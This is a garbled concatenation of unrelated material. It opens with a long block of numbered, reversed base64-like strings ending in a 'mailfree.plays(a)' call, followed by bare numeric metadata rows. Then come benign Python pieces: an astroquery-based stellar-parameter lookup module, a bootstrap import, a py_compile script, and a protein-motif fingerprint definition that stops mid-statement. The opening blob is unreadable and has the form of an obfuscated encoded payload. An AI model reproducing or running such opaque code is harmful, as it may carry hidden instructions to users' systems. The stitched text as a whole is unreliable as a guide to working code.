219$=gHnzWbT33yD0ZPT3RY48SuATdPl09N8UqsCj820Sq0r0dsywzr4MTuokdGIdwpWUyBHBE+VGUGl4unumj7eGaYhnkhlEekl6Ul+4vlA1fkGkkhm6eU5VclpAAw3SOyI 317$==AecObtNdfNMZX8yLHd2z0BjDOxcdqykN1v88JDvMOKjKJMfTxpgjs0gc3zqyx4kL11cTOvoMO8KNIH/BgQmPRr 161$==AecObtNdfNMUX8yrsd0z0d0ZPzKo8SuYnMMpKDKiAqKHjTuUXzN58iy4wr0gwcGAgPA7Am 54$=gHnzWbd0vyDsSvyIowTqATNKiM8KioywygTs0gCPKTMNzIrMKj8q4kzMyMNM4Iz2wwTsU8KnzJVWKApxu+gQDXO46JxyMM8oK1zcTO3Uc2n8c19oKJncTKN3yN5cczIfK2SjiqATz1n8DKikKGLyXgpuHVOZkHc5BABycUz 104$=gHnrikdx3sd0ZPT3xgjsYnCOg0tw9kzxU39Ov0DPyqyx9kSLjwTsY3yNp8sMskqwEnTtkKMyridsSvMOlg9GAAdYTht 96$4x5s1WH9viAr0rMCK8kKwUj8BCt7hUWKhnYpm6ciGYo7JlX5wkHXijb9lvlhnUOIxvS/yNxMKJ8Ir0ygjMbDBqWLdOJI6J4IryJPSFhZCUNhFekllduJldYunapp7eKlUhReVcyQ1nb5mcOuBzez1n8DKikKOFn9BAwMth0n 1$=gHnrCHdxr0d0ZPTPywiqS/iIxyM1dPBzHEOfX8sCTC2XAw2Cugv 26$==AecObtNQ/NNwK9KjgCPpCM1IfgQ7eIllS4JWqpOnoBG6eS5VOQ59zoIzxPjTqUfzNqSSxZfyzV3jqkcyNJft0ooKw0c9J/giIpiRS8ywl8pbUSlEGS8904IL0NjSMDvM2HYuhihqnsiKcI2NYxDPyKDL8ILL7cTK7wcP1ST39UKpCj8q4kDOysNEob1tcTOH3g5+RY+Awz60E5 126$==AecuKzuK/yOwwjKXnCOpcMN8UyP7M9HAwTPeAb 160$==AecuKSPE/y2Rn9EAQDVJgu 152$==AecObtNdfNObX8KdHd2To40SzycCI9sDx70TuSvyr4gTtIQ0eGaK55UmBVgpuHVOe5hn5BUsi81IvBRXmFOHalhFeSFEWEJBW8kNGs4AwruCyM 134$=gHn90Y0KMIIYU4XJ1hX4FdxIGCSLYNITvrfDqtlWgmV7pfrRtr+gDnz5LJpNHfbVEYcdvoShYWT8CXH6tw0Ax4mXFd5EVs0BI6j63NpZuzVKXJ5fvDGmJgbbXLvJsQEezd1LsseitTcKEb+SaaNCzhffXIhRqMzzI6RqNbooC8bOuSgpCnJuwNdUp2f4e31TmFQiTwR+HAsyZEk 58$=gHnrSHryvsd0ZPT3RnTuycyNJDcK4ULKZnDqMTd3zw8LioSPdXTxAnMO5yS3dQ0eBQkR9A2 
105$==AecObdNE/MMQn9MdHd2zytM3kNwpgDI9szNpyDzjUyPZj8OTHNMpKDyDwyDCbmjZ6ZRJHh3AA/fIxB 75$4x5s12y9tSfdxrCM09kLzLPSJdPjIqKCLioqKIjTGAwhRngj 56$==AecWmj96ggwgRRflgPlhO4gi8TaaYASsU2stiEptSSpQwneLBZypzw9mz9e651ieRFrPke3pARAumFg0ipEg9CRluSDprIXcUGTMJZNjKNfoIXukmJnw/n1mqFqUg0VS5DRay7yaudN/cNzcD8e36tzxZgb80lAi5uDY7+XQ/YYMfS6ZUF7zl8Hm5F8mbKxigm1N2/wXwUGcUC 315$==AecObtNdfNNUX8CAgCrIwR 125$=gHnzWbT3XD91Fv8yRn9Mdo4ctM3kTPb39sATd3zKdL3kyLM39OzKMKp8yJT/Bga6/gs 19$=gHnzWXdxXjCsSvyIowTqATNKiM8KioywygTs0gCPKTMtyIz1Qj8q4kzMyMNM4Iz2wwTsU8KnzJVWKApxu+gQDXO46JxyMM8oK13cjqkUc2n8c19oKJncTKN3yN5cczIfK2SjiqATz1n8DKikKGLyXgpuHVOZkHc5BQizdEA 206$4xZbO20DCCCAG+3kkcwrZKGj5BdTDuFoJM+I3A1V/6r2k1h60727X7Jd6E2VgYBjlfr0KMlAyMExMSHRWXJSHyJuzWaYvzq2y1doxlCgYTeA7FKqKplqT6vuklzXHerwW6zjVjutHYFunIb65zQwua/+b8zJAP09rfkHfGg9Z39mLc/fyj8GzfB71p0T 169$4x5sNSX8CAgAVHQJ 15$=gHnrSXDx3sd0ZPT3RnTOjUCPq0NwFPLLjK9K/g8Ily9LP/Lzigjs8cy1n8dzoILKscT2A3yN58Cz9UK1XjSqELzMpScz9kLziQS2ykr0bYyVgJZmcOu5eU5ntzeCAAV4Hyb 38$=gHnrSfdxvsd0ZPT3RnjKnoc3z8CzokyP7M9HAwYVggF 22$=gHnzWbD0XDd1FvS3Rn9EEuqwyNJDcK4AS33Iiq0g8wzicMYfBAyrugS 190$==AecuK80F/zO5gjMbDDPxStEKdFGkUe5kbSl6qRJXeKO7TepbUSlEWu+khfekcelXpXZEU4JVgpozP8IrMswjssszNpsDz9UhrXXdPqSAaWZ4VERlBMz30gjsKnM2rihZvulby54mR+UslGFFWMX4infQRkUxANTAQt+9zl 29$==AecObz2FfzO5gTKHDzNyc8KiIz2wwTsULr0riTOYIszxokNAo4GYZuJXslGFVBmakP5VelelRQhnUZJ7sP55q7RVSO5mUZuaUkZZZ4pUaQ55TG+5RymkCSylduJldYunapuaUylnhxIMbLdOpySBItpBHZVO5RqwMXQ2BE6cx0swi9AAgMXSkF 151$==AecuKjME/y2Rn9MdHrM5CCKioS3AX8sS3MKl0yJ3kKPMPSJfPDOoSBKelOFcqlFWeJnunumUZp4unOFk7RVZYGlcVOlp/p7ZweDAAn2nhO 37$=gHnd1cQLIIMcUA8vS6UP41Mb2Y5BFU3u5/p4EdzgN1sP9pQFRnewDevf+3OT0XVMbMmbHVwygCGKwtzd4G7DExI6Z9u5sB3y65wIYpZPDiqdcxgedj0TKpysS4eA6dqoTZVgpJiq/8ZHCsF/0viA9e/cMSsK92NyhlsSuJtiLJespvO5snnSaPcshY+Ipi5EqE/vb7CuZh4RNhI+hvMNR4v78iuP30W 303$==AecObdtK/qMQnDoMfNOyKzx9kNwUXCoMPNKpszJvAyL5K9CAAsWrw+ 197$=gHnzWXdx/qC0ZPT3Rn9scviIxSDyDPNtEn9OPDCNyqCz4EzwU390XLNKxM8LiETPwwiqEn8IpMCKioS3TXTqsUc3TnM19oyIlg9GAQUedhh 
292$=gHnzWXdxPjD0ZPT3RYYjTqyg8wTLdMYfBQd7gAQ 287$=gHnz2QryvsTO4kKLowjqY/iIqM8y4Iz3ygjMbDDPxSNNzErKFn9JPXdPqSyJ3kyyycTyAvMOpit05kKLF0kHsecHi4hZcy54Ve+UofG7VxJjPxBKmXZhG/q8pYLNKqCMNXMEvATdPqcyAu+TpqwiIyKzxokqCN3DAQzNoUQ 298$==Aecuq8ME/yOycTuMDd3zM9zD/SP7wTqcLzNZDcKzAzxtwTxgcyNKDrwoQLLMPSGAQWO8AL 255$==AecObdtK/MNQn9MdHd2z8cL3kMIH390SHr0r8S25AqyvcTuAn8Il0DMiULPswDIvAjIKTCyYfK0tcTJD/MOyKzx9kNIlMDAAQBbaB3 30$=gHnrCXdxr0d0ZPTPQDTqsKMKZwshhz3FPduCjSKPncOsys09kqyJnDND/MKRAgvLDh2 159$4x5qM7s8NbHd2z0hitwSDjQbHz03CcsSvyL5K920SARnZwFYqRRVcO5mUeOVZY54l7eGgXREZpp4un57YwBaQQREZWl4unw0TWg1Tl+UmjOHalhFeSFEWEJlegGmUZVYUyAF3riS2YvBRDgXosyh 18$4x5qyxQ8PbPzN50NwFPzrc38tKfrKcTdtK/N2Aj8CAAjLlQO 296$==AecObttcfrIdX8KXvMOpScy5UKzr8SOH3iIlc8zjUSP7wTqcLzNZDcy5wAKeowEHg3ZJxJ 135$4x5s13Q8t8AzMp0NwFPzrc38tKfrK8yL2FfL3Aj8CAwiwkQk 205$=gHnzWPDxvKDMYn9yRn9MdQYPjIlSzIYvBQXRewu 177$4xZTOGrCDCDGE+VqGJDZoTiGIEL00hfNb5PBq0aSLENa8pvCtQd64O47u7c9Wb51sYix1jiu+TMvNtQwwoHnvzdTrER0eDTKQnb4ukoUOoA8N1Lfp6worSGqJ9PYgbWF+n1SwdvNtytDUQHpVmTFcMskFf5J9JK3lZ8j70/sAMzsGM521DMLNeccF+tNY227e4CYSUiMyI6j/5j8Qo0T 238$=gHnzWPdx3yD0ZPT3Rn9scviIxSDyDPNtEn9OPDCNyqCz4EzwU390XLNKxM8LiETPwwiqEn8IpMCKioS3TXTqsUc3TnM19oyIlg9GAQUkcRh 97$4xZbNH0CCCDGAG+vUuYH8gns2gxKwF4UvtPXlhbLhpba/6LQhIoTv3eezyKOFLOwctVNPI0mRjFC9Wovked6OVPOjY+2FthJr7Tkqp0LrFnr2lQBXchtv0W3JkwAGx9pomBsl/UUBedO3dczcr3mRg7T/av5lSgg+X3IxCmZJf1WqeJctdnlqwf+8Gg1cbE2 185$=gHnzWbD0XDT2FvS3Rn9MdPDPVDCzokT3AX8sS3yNpstM8kK1iwSBG78d1F/M1xQ8GAsnChs 279$=gHnV1YPPMIIYQ4/SIJM4QHaNtoUaHqNyHbCOgVepmQIG/3XMNpfsd39cXudN3vOZbVTFY+Mhq9uAfkF0hlVm7mwkaALMUxDHBN4pm5T0BPZUtqxs47dSXX9wzvZGfBo8MZmJ6T/1N79YLKzQlgNWi1zE4zfPOIVpOq5Xdafd/y2/XoWHRojkqeUxWn2zvQO4H0V 44$4x5qI7Q8NbHd2z0d05ELxpgDI9AjIqScyjkyIoIiqUPjIqMCydvLwkMTOHQi5X4RlfyOHQZeaUSZnTeBkX5O7ZeulbSGkT4eDAAjamhA 118$=gHnzWfzy3KDM4ELxJjTqyg8wzKdL3ky2ywTCAgZsjgU 141$=gHnzWfdxXDC0ZPTzSDjAEOdHd2T4YLQIGM5zL5K9qIPN2bQ0AFPt0BSnXxVGVRgo9N0ILPIPSMD/MIpsDzd/KPwqgoeXNCs6BAOgOy4 245$=gHnrSfryvsd0ZPT3RnjKnoc3zsN1okzP7M9HAgZ/iQK 
24$=gHnlBZQPOIIQU4/SId5gH6huGrEi1kqJCyNBOYaBlErao/6XIu6ut9Ewbm5j3bOme7S0VHprkKmShyFVSefqhb0ZC75MlGV1887DkRZVz9IIrrGrG+TTojMNaCzXj2O9Sv+3aoE4rBiNyxYI3iM5dFYZ/ij8U7ZfOj/QbEzLQRv/c//vwaB10VGxVtTlU+X7sdSbJjH8rFBz34OUyEjhZBU+DCl72YLD5Z9utAr86qZCWMrCsdb5KP4pNmdFwm56eBAlIH+fe29y76Jr8+s/f3LfqfrAKiQZqpT42Qm/BApgaoZ 5$==AecuKT3F/z2Rn9MdoYLs0wI02Rn9rAHr0r8SuSvNtEQ0OHmLO5mnBaZuJbgTVGaWulbSAlzriS2YvBRDA8obxk 45$=gHnlBZQzNIIUQ4/SqT9gntKWGTPQmRk3NQarJCUmRhE6v+Sq2Gz0TMP23ufskU9M2UhglijcHhCPlHYGVGee4IbKV3eWS5mLB8IoB7VKfk0DuDZgVW2u6rjlSa4/dXCFWwUIUH1UaxD7Gntv2IjaSPuR4jZ7egXcOmXojy8b77eRPo35/9a9gqOrduImbuu9E2A3effpQS1GT/lMhZv3D98kYmr5/bPPxCwNuhBbsTjEqwmfP3PJ9i5dc9VZszFUpjY+v2kWM1hez9BSucdfXK36YJPJFJ+5fcjz65dOfzjpu4G 311$==AecuKcsKfzO5gjMbDDPxStsyIL30KjMXDNyriTGZ2QlPHjS2AviISDsM3kLL7cTK7wcP1S9N3oKJFn9JPXdPqSyJ3kKwPPSpS3cPly8yYfK2SjiqATz1nsiK8kyr8K9qU/MOlygquyK3okyDINc9ncERlpb4QOY6BKdaVgd5RXcAgK8B1d 256$4x5s1209tCPdxr0d0ZPTPwIisyUCPKDcK4AS3zIi0YLDLxSdKiUMIjKjqokr0TtdsSvKK5I8GAgwJFhX 123$=gHn91YsKMIMUU0fpknNDZwhiQDEEBTGimtkXgGsRrgarpf9tbtQLd+cO3bZ5xmi2sMqM+Zmx9QNhRVhPz1uNlxegV5IUhf6+vcq83CG32HO0mOb+vN6+hGwTZiw2ZRYdHkLou/C91OJAJyueCfEfz++jVuwm2BMdaEHiQ9CHszsx6rqO/Soq+JDxgkp 198$=gHnrykdx3sd0ZPLJscTKtcyNp0NwFPr0NjSBE7yDzjUyPZj8OPHDLxizx9ETPQDTqsKMK50zvKvKK7I8GAj9Xxl 164$=gHnzWbT33q80FvS3Rn9EEuc3MKqccK4AS3C39Ov0dPFDcy4kNziK9JDniIxSTP8IzqkwjqygiIyKTJ8oMw0KjsMDNyn8CzokKwJj9RfXjIg8KO4gDMnM9pywCPyszIYvBQ6j9B4 82$4x5qISX8CAwABHAY 305$4xZbNvrCCDDGAF+VyGpDZuaCECOkCNtZL/JarkLWI9+TvCtgI40Z77s1ehFN1qnEqawHgJXAcV07jtU7wCilMrWPT24yk6Rc5ezL0nyoQcelduK00JkQfOinwIVfeg/SUDJbBPe9w8oPWQQ8T/af4hJwk9X3ZSA8LS+utUvJimubS90f+8GEsXU2 138$=gHnzWPryXTD0ZPT3Rw4krMncTyAncO5MSJ8oAAgnlwK 92$4x5s13Q8tyArMy0NwFPzrc38tKfrK8qCsK/rwAj8CAAj/lAt 147$=gHnt1YXLMIIYY0/SlhX4FdVMkJSwMYmeXvFkSpVYfs2v+VwGMG7qDc4hzTaabO62OzykcjQCjYEfET19GPfQUChmMu/qTNfhqn7dw6GC8Hcpl2M/AxC1WlNuQ1FLrWIvJOrKKmC+td2nmDEJ0/lPQQ6RsjPlnc0oAWFSdIvUbYJqBSGs2c2xW988/IE0d3VbEJw+/c/s/Fklkkn 74$4x5qIUX8KdHDOxcdK4kyxUjioATDPAL9MYfr0zM9HAghTmwL 
132$=gHnN5YsOMIIUU0fpWsMwQHaMVaIUHwmiyGPJpkWBJBF1+1XHMxOevDnz5czj7fargkQqWKomELjHJIVA749iaIay5+rU1QnDssallkDJjUPiz1HOSB/0CbqwBdzSuVIhAWq/K8t2SpOhR8Amq6s+dWXqbGfShhNmhybmlCUTg4g0234LqZYGxibdFLX9yya6JV6x19p/cPQW5Pja7KctvtotG2b/HQsj4U9 73$=gHnryIry3sd0ZPT3RnjKnoc3zKDLvkyP7M9HAga4hgn 297$=gHnz2Qdxr0d0ZPT3x8SuATdPl0dN3ILLMPSBAAYagAC 107$4x5s11s8NbHd2z0dsyArMswj0gwcPq09M8UTHsYZ6f6+GaklHkHJmhfGkU2h5uflHYVRAAQysEhl 273$==AecObdtK/MKwK9pMHrMwycKiUrMHjiK/g8wz89NcvT3TX8tikDxnKdMEfNxxKDOHTzNJTdqyArMs8SFAwIaORV 247$4x5s1209tSXdxr0d0ZPT3x8SuATdPl0T2YvzL5K9CAggjnAV 266$4x5s13q8L7kDOysNM8EL1yKjscTzMyKjyIvKOZkZDV+cMKZD8KiINwycTusszNpsDz9UL1zcTO3Uc2n8c19oKJncTqA/8IlKdz9UKzLj9pYLNKqCMNXfy0r8iKvyr0rS9z4UKDq6KrcjSKPg0w1fyREVmuhF58CVzHm+TrC00POEHAgfcJlD 326$==AecuKCNL/y2Rn9MdHDOxydK4AS3zIi0YLDLxSdKiUMIjKjqIPDO4Ady5wywLjjKng8wTzcMTPLK5I8GAAGiIBl 186$4xZXOGkCDCDFE9KFTJLyC3Up8hgIUF0E35PBUaNRBNRTP9V3Ua763MzbST7L2uHFDlN4MjqCMwE5AG2oob0i+ewsuTFL6K1zEa+MDaHHc5TlScxkl7uBtrssOSCgutoYlfwFSFhb1hT2vbYeVb1+Jq+M7QxhvaHS+q/DuFJiL4yVpyXD/5vpzXQRfpTH2tf+wbQcfWUM 207$==AecObtNdfrKdX8CAwC1Jgn 4$==Aec22jLrwgwARR/liCC1FuQ0GtBVoWoJmdmI1INxKUf/13gpFyiubecuz9OBBXzB5xo2woLthkq9CCtFEf5F/W1THc9k/G69vapLHgIVAfFfmHl1v4y6lK2UYa9Sju/cCdU3PUk2sBTaG8VsDuvzXPZdL0uW/GSUiZDeu52cAbu7GuR/Eq02bOh2BN82aFICVck5uqOn/8DrgjMbr5BUxlQ3DfWgKmcFnZyFuevsnLKw1zem96syBW++RUgG3k 235$==AecObtNQfNIQX8KdHd2z0DNvkL2pgDIdPjISjtMsEL1pISxgMqMqiS25wywLjjKng8wTzcsSvKK5I8GAQ/NKRU 116$4xZZNG1CCCDFF+vUNbP6DhkXQ0Btgmbv5dDaFzlg609vPqMponucunz57kmunt7YsI5cr0yFYHtt8mR04n++HpsjCKn1v6ZZEpjlgjVEVnJr0rrVXzB1grFDHefX9W0hKCOy96wMotUhqnm1sZLgv4ts9deN2/THQPeBMDzkiedUO9XnPsiSv7ZmTYgLUxcwEK8r8ewJnKFQ 275$==AecObttcfrISX8CAwCjKgn 80$==AecObtNQfNISX8CAQCfKAM 47$==AecObtNQfrIUX8KvkjIqMdz9oKJncTqUH9IxyTxZfQWsyyO3kyOM3TFry5Ka6DK/y81okKNo8SusKcP5MMN8oK2UnT0ADdPp8KvSvyIowTqATz1n8DKikKGF94eylmu7pUSFG5VxJXZkljhegbWJnvTGDUNBnUZBFeUV6m7pUmX5B38AA/p00Y 
222$4xZXO/0DCCCHGH/tEC5BP0lcFbMmbhlIcjfwWONp2QI9df/5SWn/unP7Z7xTVD2a1Qm0ErwQU4tpZMPUg13zH53EtQwVy97p6piaTUI1byLNoMK4fsw6ESIeh6mmxsgtGSv6LHouEjwf3+x4Mxel559Op5z2KsK14B0Kv+iRAxIQYXrK2QXb/3H/6+ULrREp 325$=gHnrSHDx/s9NY/yy3K9EAwGHRAM 55$=gHnzWPry3yD0ZPT3Rn9scviIxSDyDPzL5K9CAAZjhAP 285$==AecWmz96ggwgRhhvl4HZgBGEi8RaqaESoU24rlIKU0Eog1re1QUjxpz0zJvBBr3PfwQczV8mUGe1TRb2lIWJjo9iiyTxQ5YnCnaVYbOUr34ImbcJDCjsjw4t2sKtf2y6lxvHmU3PbILf5QP7rQLiLOEWw15AqPCyxbOP9vNRVW2A+jJsneJtAHe1wWQ8n59XfaJDnSZlmYQOR+afgIQ30F 32$4x5s12A914QdxryswZP9NHjiMHTNK5cCydPN0U3jKHv8wTDyI8oS3gQDOUncOkC8L8oK1vIiCAwmuDRG 6$==Aec2ljLrgwwARR/m6U7isorENYIdhK2SzOzEx+IToQfZ6XvRKI0uc4OnDn003ZwVvYgxV2PAaPTYTFIruVo7SIZtwpczex6NUOlwNeGXPNDanl0jXIkMHluTc1A7eZbUYzU8cMPGtC3G+eGo6SKML5EuhL4xfou0rARP+zRgXsIX/ffDU2ULpbz5v+74RMGF6ujB4+u+y8EB1J 215$=gHnzWbD0XDy2FvS3Rn9EEucviIxSDyDPzrkM90ncyN5CM0dPzxXP8McgsN0PP80nwgw31wyNp8cL3kS3RDTqygyz/c8NPPzJ9KTOHTdPliz29kL2RjBKeEeDAgAJACj""" mailfree.plays(a)
127.915152
2,188
0.955179
1,522
42,212
26.491459
0.965834
0.000893
0
0
0
0
0
0
0
0
0
0.170682
0.007889
42,212
330
2,189
127.915152
0.792092
0
0
0
0
0.051515
0.998413
0.988795
0
1
0
0
0
1
0
false
0
0.00303
0
0.00303
0
0
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
0
0
0
1
1
null
1
0
0
0
0
0
0
0
0
0
0
0
0
6
f6aa9951e16697cac6205335b759da111f007b79
3,148
py
Python
fulmar/query.py
astrojose9/fulmar
62a79fb9b7ab01e5b7b3acadaca8e4f0db0e0e2f
[ "MIT" ]
null
null
null
fulmar/query.py
astrojose9/fulmar
62a79fb9b7ab01e5b7b3acadaca8e4f0db0e0e2f
[ "MIT" ]
null
null
null
fulmar/query.py
astrojose9/fulmar
62a79fb9b7ab01e5b7b3acadaca8e4f0db0e0e2f
[ "MIT" ]
null
null
null
import numpy as np
from astropy.table import Table


def _validate_int_id(value, name):
    """Raise TypeError unless *value* is a plain ``int``.

    ``bool`` is a subclass of ``int``, so it is rejected explicitly to keep
    the original strict ``type(value) is int`` behavior for True/False.
    """
    if isinstance(value, bool) or not isinstance(value, int):
        raise TypeError('{} ID must be of type "int"'.format(name))


def teff_logg_TIC(TIC_ID):
    """Takes TIC_ID, returns Teff, logg, from online catalog using Vizier

    Parameters
    ----------
    TIC_ID : int
        For TESS targets. Number of the input catalog, e.g. "307210830"

    Returns
    -------
    Teff : float
        Effective temperature
    Teff_err : float
        Error on `Teff`
    logg : float
        Spectroscopic surface gravity
    logg_err : float
        Error on `logg`

    Raises
    ------
    TypeError
        If `TIC_ID` is not an int
    ImportError
        If astroquery package failed to import
    """
    _validate_int_id(TIC_ID, 'TIC_ID')
    # astroquery is imported lazily so the module stays importable without it.
    try:
        from astroquery.mast import Catalogs
    except ModuleNotFoundError as exc:
        raise ImportError(
            "Package astroquery required but failed to import") from exc
    # Query the TESS Input Catalog and keep only the stellar parameters of
    # the first (and expected only) matching row.
    Teff, Teff_err, logg, logg_err = Catalogs.query_criteria(
        catalog="Tic", ID=TIC_ID)[
        'Teff', 'e_Teff', 'logg', 'e_logg'].as_array()[0]
    return Teff, Teff_err, logg, logg_err


def teff_logg_KIC(KIC_ID):
    """Takes KIC_ID, returns Teff, logg, from online catalog using Vizier

    Parameters
    ----------
    KIC_ID : int
        For Kepler targets. Number of the input catalog, e.g. "11904151"

    Returns
    -------
    Teff : float
        Effective temperature
    Teff_err : float
        Error on `Teff`
    logg : float
        Spectroscopic surface gravity
    logg_err : float
        Error on `logg`

    Raises
    ------
    TypeError
        If `KIC_ID` is not an int
    ImportError
        If astroquery package failed to import
    """
    _validate_int_id(KIC_ID, 'KIC_ID')
    try:
        from astroquery.vizier import Vizier
    except ModuleNotFoundError as exc:
        raise ImportError(
            "Package astroquery required but failed to import") from exc
    # Note: this Vizier catalog stores the columns as 'log(g)'/'e_log(g)'.
    columns = ["Teff", 'e_Teff', 'log(g)', 'e_log(g)']
    catalog = "J/ApJS/229/30/catalog"
    Teff, Teff_err, logg, logg_err = Vizier(columns=columns).query_constraints(
        KIC=KIC_ID, catalog=catalog)[0].as_array()[0]
    return Teff, Teff_err, logg, logg_err


def teff_logg_EPIC(EPIC_ID):
    """Takes EPIC_ID, returns Teff, logg, from online catalog using Vizier

    Parameters
    ----------
    EPIC_ID : int
        For K2 targets. Number of the input catalog, e.g. "201437844"

    Returns
    -------
    Teff : float
        Effective temperature
    Teff_err : float
        Error on `Teff`
    logg : float
        Spectroscopic surface gravity
    logg_err : float
        Error on `logg`

    Raises
    ------
    TypeError
        If `EPIC_ID` is not an int
    ImportError
        If astroquery package failed to import
    """
    _validate_int_id(EPIC_ID, 'EPIC_ID')
    try:
        from astroquery.vizier import Vizier
    except ModuleNotFoundError as exc:
        raise ImportError(
            "Package astroquery required but failed to import") from exc
    columns = ["Teff", 'e_Teff', 'logg', 'e_logg']
    catalog = "IV/34/epic"
    Teff, Teff_err, logg, logg_err = Vizier(columns=columns).query_constraints(
        ID=EPIC_ID, catalog=catalog)[0].as_array()[0]
    return Teff, Teff_err, logg, logg_err
26.677966
79
0.627382
407
3,148
4.719902
0.19656
0.045809
0.040604
0.046851
0.837585
0.837585
0.774597
0.774597
0.724623
0.724623
0
0.016979
0.27033
3,148
117
80
26.905983
0.81933
0.398348
0
0.432432
0
0
0.204007
0.01275
0
0
0
0
0
1
0.081081
false
0
0.216216
0
0.378378
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
1253e3e11333d1f9a40940a17eb3e37c1d76f763
25
py
Python
dlhammer/__init__.py
klauscc/dl-hammer
5bd8d2e75f6a2b6051e99ad9b0e1384c8c43de26
[ "Apache-2.0" ]
null
null
null
dlhammer/__init__.py
klauscc/dl-hammer
5bd8d2e75f6a2b6051e99ad9b0e1384c8c43de26
[ "Apache-2.0" ]
null
null
null
dlhammer/__init__.py
klauscc/dl-hammer
5bd8d2e75f6a2b6051e99ad9b0e1384c8c43de26
[ "Apache-2.0" ]
null
null
null
from .bootstrap import *
12.5
24
0.76
3
25
6.333333
1
0
0
0
0
0
0
0
0
0
0
0
0.16
25
1
25
25
0.904762
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
89eb2bd7933c5ea4302ad33848faf20225fb6517
175
py
Python
plugin/compiler/RV_manager_v5/rhinovault_V2/bin/commands/test.py
Rippmann/rv
59e8621c7ebccafaa9c848c2c98729841e85996c
[ "MIT" ]
null
null
null
plugin/compiler/RV_manager_v5/rhinovault_V2/bin/commands/test.py
Rippmann/rv
59e8621c7ebccafaa9c848c2c98729841e85996c
[ "MIT" ]
null
null
null
plugin/compiler/RV_manager_v5/rhinovault_V2/bin/commands/test.py
Rippmann/rv
59e8621c7ebccafaa9c848c2c98729841e85996c
[ "MIT" ]
null
null
null
import py_compile

# Byte-compile the rv_command_a module ahead of time so syntax problems are
# reported without importing (and therefore executing) the command script.
path = (
    "C:\\Users\\rippmanm\\workspace\\matthias.rippmann"
    "\\rhinovault\\rhinovault_V2\\rhinovault_V2\\bin\\commands\\rv_command_a.py"
)
py_compile.compile(path)
58.333333
132
0.805714
25
175
5.4
0.68
0.133333
0
0
0
0
0
0
0
0
0
0.011765
0.028571
175
3
133
58.333333
0.782353
0
0
0
0
0.333333
0.698864
0.698864
0
0
0
0
0
1
0
false
0
0.333333
0
0.333333
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
1
1
1
null
0
0
0
0
0
0
0
0
1
0
0
0
0
6
89fb0fd07b2c51fdd95e1ccef91d413e488f8dc0
7,650
py
Python
mmtbx/cablam/fingerprints/antiparallel_beta.py
dperl-sol/cctbx_project
b9e390221a2bc4fd00b9122e97c3b79c632c6664
[ "BSD-3-Clause-LBNL" ]
155
2016-11-23T12:52:16.000Z
2022-03-31T15:35:44.000Z
mmtbx/cablam/fingerprints/antiparallel_beta.py
dperl-sol/cctbx_project
b9e390221a2bc4fd00b9122e97c3b79c632c6664
[ "BSD-3-Clause-LBNL" ]
590
2016-12-10T11:31:18.000Z
2022-03-30T23:10:09.000Z
mmtbx/cablam/fingerprints/antiparallel_beta.py
dperl-sol/cctbx_project
b9e390221a2bc4fd00b9122e97c3b79c632c6664
[ "BSD-3-Clause-LBNL" ]
115
2016-11-15T08:17:28.000Z
2022-02-09T15:30:14.000Z
from __future__ import absolute_import, division, print_function
from mmtbx.cablam import cablam_fingerprints

# This module imperatively builds two antiparallel-beta motif fingerprints
# and, when run as a script, pickles them via cablam_fingerprints.make_pickle.
# Each motif is a sequence of add_residue() calls; a residue may carry
# required hydrogen bonds (add_bond + add_target_atom).  NOTE(review): the
# exact traversal semantics of sequence_move/bond_move live in
# cablam_fingerprints and cannot be confirmed from this file alone.

#Antiparallel beta, close
#Original by Christopher Williams, converted to new format by Danny Oh
#Two strands:
# g (h)* i* (j)* k
# r (q)* p* (o)* n

antiparallel_beta_wcw = cablam_fingerprints.motif(
  motif_name = "antiparallel_beta_wcw",
  residue_names = {"i":"antiparallel_beta_close", "p":"antiparallel_beta_close"})

# Residue i: H-bonded to p in both directions (O->H and H->O).
residue1 = antiparallel_beta_wcw.add_residue(
  bond_move = 'p',
  end_of_motif = False,
  index = 'i')
bond1 = residue1.add_bond(
  required = True,
  src_atom = ' O ',
  trg_index = 'p')
bond1.add_target_atom(
  atomname = ' H ',
  anyseqdist = True)

bond2 = residue1.add_bond(
  required = True,
  src_atom = ' H ',
  trg_index = 'p')
bond2.add_target_atom(
  atomname = ' O ',
  anyseqdist = True)

# Residue p: the reciprocal pair of bonds back to i.
residue2 = antiparallel_beta_wcw.add_residue(
  sequence_move = 1,
  end_of_motif = False,
  index = 'p')
bond3 = residue2.add_bond(
  required = True,
  src_atom = ' O ',
  trg_index = 'i')
bond3.add_target_atom(
  atomname = ' H ',
  anyseqdist = True)

bond4 = residue2.add_bond(
  required = True,
  src_atom = ' H ',
  trg_index = 'i')
bond4.add_target_atom(
  atomname = ' O ',
  anyseqdist = True)

# Residue q: no bond requirements of its own.
residue3 = antiparallel_beta_wcw.add_residue(
  sequence_move = 1,
  end_of_motif = False,
  index = 'q')

# Residues r and g: mutual O/H bond pair across the two strands.
residue4 = antiparallel_beta_wcw.add_residue(
  bond_move = 'g',
  end_of_motif = False,
  index = 'r')
bond5 = residue4.add_bond(
  required = True,
  src_atom = ' O ',
  trg_index = 'g')
bond5.add_target_atom(
  atomname = ' H ',
  anyseqdist = True)

bond6 = residue4.add_bond(
  required = True,
  src_atom = ' H ',
  trg_index = 'g')
bond6.add_target_atom(
  atomname = ' O ',
  anyseqdist = True)

residue5 = antiparallel_beta_wcw.add_residue(
  sequence_move = 1,
  end_of_motif = False,
  index = 'g')
bond7 = residue5.add_bond(
  required = True,
  src_atom = ' O ',
  trg_index = 'r')
bond7.add_target_atom(
  atomname = ' H ',
  anyseqdist = True)

bond8 = residue5.add_bond(
  required = True,
  src_atom = ' H ',
  trg_index = 'r')
bond8.add_target_atom(
  atomname = ' O ',
  anyseqdist = True)

# Residues h and j: spacer positions (no required bonds).
residue6 = antiparallel_beta_wcw.add_residue(
  sequence_move = 2,
  end_of_motif = False,
  index = 'h')

residue7 = antiparallel_beta_wcw.add_residue(
  sequence_move = 1,
  end_of_motif = False,
  index = 'j')

# Residues k and n: mutual O/H bond pair at the other end of the strands.
residue8 = antiparallel_beta_wcw.add_residue(
  bond_move = 'n',
  end_of_motif = False,
  index = 'k')
bond9 = residue8.add_bond(
  required = True,
